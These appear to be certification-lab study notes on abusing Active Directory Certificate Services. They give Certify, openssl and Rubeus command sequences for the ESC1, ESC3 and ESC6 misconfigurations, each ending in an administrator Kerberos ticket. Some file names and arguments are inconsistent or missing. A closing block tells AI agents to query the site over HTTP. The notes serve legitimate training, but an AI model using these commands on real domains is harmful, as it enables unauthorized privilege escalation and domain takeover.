# AD CS [Active Directory Certificate Services](https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/active-directory-certificate-services-overview) (AD CS) is a Windows Server role for issuing and managing public key infrastructure (PKI) certificates used in secure communication and authentication protocols. ## Tools Certify and Certipy tools to enumerate and abuse misconfigurations in AD CS: {% embed url="" %} Certify {% endembed %} {% embed url="" %} Certipy {% endembed %} ## Enumerate ```powershell # all registered CAs Certify.exe cas # enumerate templates Certify.exe find # enumerate vulnerable templates Certify.exe find /vulnerable ``` ## Abuse ### ESC1 ESC1 is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN). {% code overflow="wrap" %} ```powershell # Find vul template Certify.exe find /enrolleeSuppliesSubject # Request cert Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator # Convert it to pfx and set password openssl pkcs12 -in esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx # Request TGT using the cert Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:123456 /ptt ``` {% endcode %} ### ESC3 ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users. {% code overflow="wrap" %} ```powershell # Find vul template Certify.exe find /vulnerable # Request a certificate based on vulnerable template Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:vulnerable-template # Convert it to pfx and set password openssl pkcs12 -in esc3agent.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3agent.pfx # Request a certificate on behalf of DA Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:vulnerable-template /onbehalfof:dcorp\administrator /enrollcert:esc3.pfx /enrollcertpw:123456 # Convert it again to pfx and set password openssl pkcs12 -in esc3agent.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3agent.pfx # Get TGT using the pfx certificate Rubeus.exe asktgt /user:administrator /certificate:esc3.pfx /password:123456 /ptt ``` {% endcode %} ### ESC6 ESC6 is when the CA specifies the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. \ This flag allows the enrollee to specify an arbitrary Subject Alternative Name (SAN) on all certificates despite a certificate template's configuration. {% code overflow="wrap" %} ```powershell # Find vul template Certify.exe find # Request cert Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DCCA /template: /altname:administrator # Convert it to pfx and set password openssl pkcs12 -in esc6.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc6.pfx # Request TGT using the cert Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:123456 /ptt ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dudisamarel.gitbook.io/crtp-notes/privilege-escalation/cross-domain-privilege-escalation/ad-cs.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.